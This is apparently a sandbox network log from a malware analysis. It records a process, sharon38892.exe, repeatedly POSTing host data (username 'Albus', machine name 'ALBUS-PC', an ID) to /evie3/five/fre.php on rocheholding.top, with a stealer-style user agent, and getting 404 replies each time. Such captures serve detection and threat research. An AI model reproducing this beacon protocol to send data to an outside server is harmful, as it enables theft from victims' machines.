May 23, 2024 20:18:44.555512905 CEST	623	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:44 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=36%2FCEE2AC6GU7teWdGAWwFIgg359qm2I0ctqiY5pzAbVp80M9lk%2BRhMzQgTFMGOo2m5dvuN9clicTQuOIFS9MYr5cb458Ya9XBH10osByHzVQGlMPVlz%2FzF22PcybNNEyGAD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870cda5ce18c83-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.22	49225	188.114.97.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:44.730540991 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:44.785157919 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:45.475836992 CEST	625	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:45 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OGnWgQO7%2FbNu0DZCyl3KOUfKVpBZ9RTokYZ%2F95CnyGkK%2FOilZmpfMUSsjJr6JmP%2FnaoDDNm6pHA30ultWgwnz1TmvtoUlRGQKyH5g1rEdZSqE845OA4AaATShOYCEdbqNGOF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870ce03fde430f-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.22	49226	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:45.625277042 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:45.676068068 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:46.361529112 CEST	633	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:46 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gJGcG4fy%2F2v0FuTdzDYQDHetOkyxb9nMmqXVLrZzVC6a86o1FhNpi6%2BqLKo2548OanW%2BKffI2fN%2BJaWr%2FKXx8sZsnv8a%2BySHP7UlIDgMXewUxC7%2BrjBMFEHwA92uU%2BZtDsG2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870ce5dbf37295-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.22	49227	188.114.96.9	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:46.517579079 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:46.568125963 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:47.281491995 CEST	623	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dGm295ElkMD4dU9034IJxEDzfkh09VoRvMnWPoV67yUW7ETrM0dmAdkPb6qBzeqtJcynmogCmlssb1U1rQda0%2Fu8IqPhas9T%2FAxWRsKphhPcfgjLLZNxKE4lor%2BMbkf5AmnF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870ceb6af1c436-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.22	49228	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:47.441037893 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:47.492285967 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:48.175781965 CEST	635	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:48 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MIbmHNgrEsWGJ3DLTK7Tm2a%2BpgWsToR5e8hj%2FMoBoUk%2BCOijTNhV4%2FpUQQ%2FkvXF9%2BmwKbhCPJhj%2BpLv1Z77Yr8EFp254oYu1t5lk%2FtGijZRspeTk8%2F8PViFL9MkhesjK76NW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870cf12cdf8cca-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.22	49229	188.114.96.9	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:48.359256983 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:48.416635990 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:48.995060921 CEST	631	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:48 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wPCCyL%2F%2FCO8LsARZEbzOkQ%2FSSVsdxJhEDE8I6St%2Bz5TX9EEOTQxVY%2FNsBQkNuKdpdsM%2B0HzH1HMrZdcEr%2FdrFXlD6sJLKJQamInYWZBHxIrAwIo7nujV7b4WsBcr4FKyPRdo"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870cf6dbc372bc-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.22	49230	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:49.167216063 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:49.224333048 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:49.907802105 CEST	631	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:49 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FFrR3BxRKjgAQmUVkeufMyXsPt9hWiQr860vPXBEn35oPUs8UNZn9Of32pZCtKm3coRNVGu14pn%2BXp%2BqNClPSdhJ%2B76yJ%2BoEfABGOLos%2FACMnPvCe0uzO%2FU9kuaPl0kS3QKJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870cfbf9df0f74-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.22	49231	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:50.061779022 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:50.115547895 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:50.904115915 CEST	629	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gTIs7LpjtE8jTqjnu%2B1beGKp57OubuDqlqSTCsmjXRGHBQ%2FYDh%2BbaZl9yNUwZxWTi%2BaogCCPfTYQamPlwuK4lR54pwQMdxmh%2B8CYph2ebDeCGkD8BOEiV2mPyvHgXVmb%2FyT2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870d018814428e-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.22	49232	188.114.97.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:51.088057041 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:51.139714003 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:51.811686039 CEST	631	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=41lHOgF7T%2BC2VTWM40gWq9H65GbT5Zt7B5%2FPfNeis%2B9%2F5NEW0SSpBNpOeJA4G4FmKqr07FbyuaUV3GLfzxuvmtx6Ul7%2BsimO%2BB3NU2P%2BCBNcqAAfMQLSYSAryasT5vUZbVn0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870d07ee5978dc-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.22	49233	188.114.97.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:52.425127983 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:52.471481085 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:53.175486088 CEST	621	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:53 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yee3ERWWGlPYfeqmfjp8TwWhUcvjd6bYjw0DAmb3%2BP9a9Xvk6JjpmSxpi%2Fvqe4ypJVokOMmlnzdwPyguPVdkuMmJRuSLdeZ278reG5aTepxHQraeFCupjmRmCSSHgA0jJcgz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870d103a3b4372-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.22	49234	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:53.400223017 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:53.452541113 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:54.152542114 CEST	627	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:54 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ogDKa9Tkfrpjtgq99LBXic5sWzRgYUW0cxFEh21Iznvs7CEg5nVfEJ%2FLF6WLQsK4r8uKuvRQn8p2iU%2FQYMgiBcuKdY2CGSlYZ4gjH46ENB9A%2BTHgO0CFSAzvWlUYv%2Bgy%2BDpz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870d1679587c93-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.22	49235	188.114.97.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:54.312724113 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:54.368185043 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:55.058381081 CEST	621	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t4SS3x%2BTEnZUHzwz5I3B%2FqM58zxp3iCF4yRuH8WVUsfyxbiJf7wUUewtKosGUZQDY7p88pTrsCBSJ36yvNoRpApahOWFX3kaxgU9n9jSZCukbJtwHpI15AS7rLdFLN9vKWCO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870d1c197b4356-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.22	49236	188.114.96.9	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:55.233505964 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:55.285542965 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:55.949836969 CEST	631	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G2t7agpthYpZsSs1OJ2EmRaQRcpQZFRNjPh%2FMITFUq06K2aOTSrqUA0XL%2F%2BFFXthkFlcNZvTo7SQXdzKfirFOovXQ%2FKfzGMjSvH3KFtWlKyDzeaA%2F5p7ROu6jBbQ%2FDAG%2FrIR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870d21bef44267-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.22	49237	188.114.97.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:56.093322992 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:56.147967100 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:56.761086941 CEST	623	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:56 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VPXldfyHPVYKfuZMoru0TM0Kd4ogA%2BXZFEuOJPsZWsuqN2tgnDzqz1SRlXIspqj8G17hv4%2FLdtXfSkko8Ub8D%2Bzb4E7OhToEx2gNh5lm7SH9NJ7OduSWBdr0PmB07tFlEBmJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870d275c0a0f83-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.22	49238	188.114.97.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:56.909323931 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:56.960011005 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:57.642050982 CEST	631	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:57 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CD0XlmMg0akmKwEu%2FnYxZJ46xvR%2Fe0%2BQA2e%2BLMGjSzzqIATLEh3dlIWte7ZsXt3QamifcU4C3Bf7SkYw0n507MF5MzYJlhGbfQLytWSWRsh0JBjzgLO92oy8uFfv1D%2F%2BRnC%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870d2c4e3343ac-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.22	49239	188.114.97.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:57.792134047 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:57.851361990 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
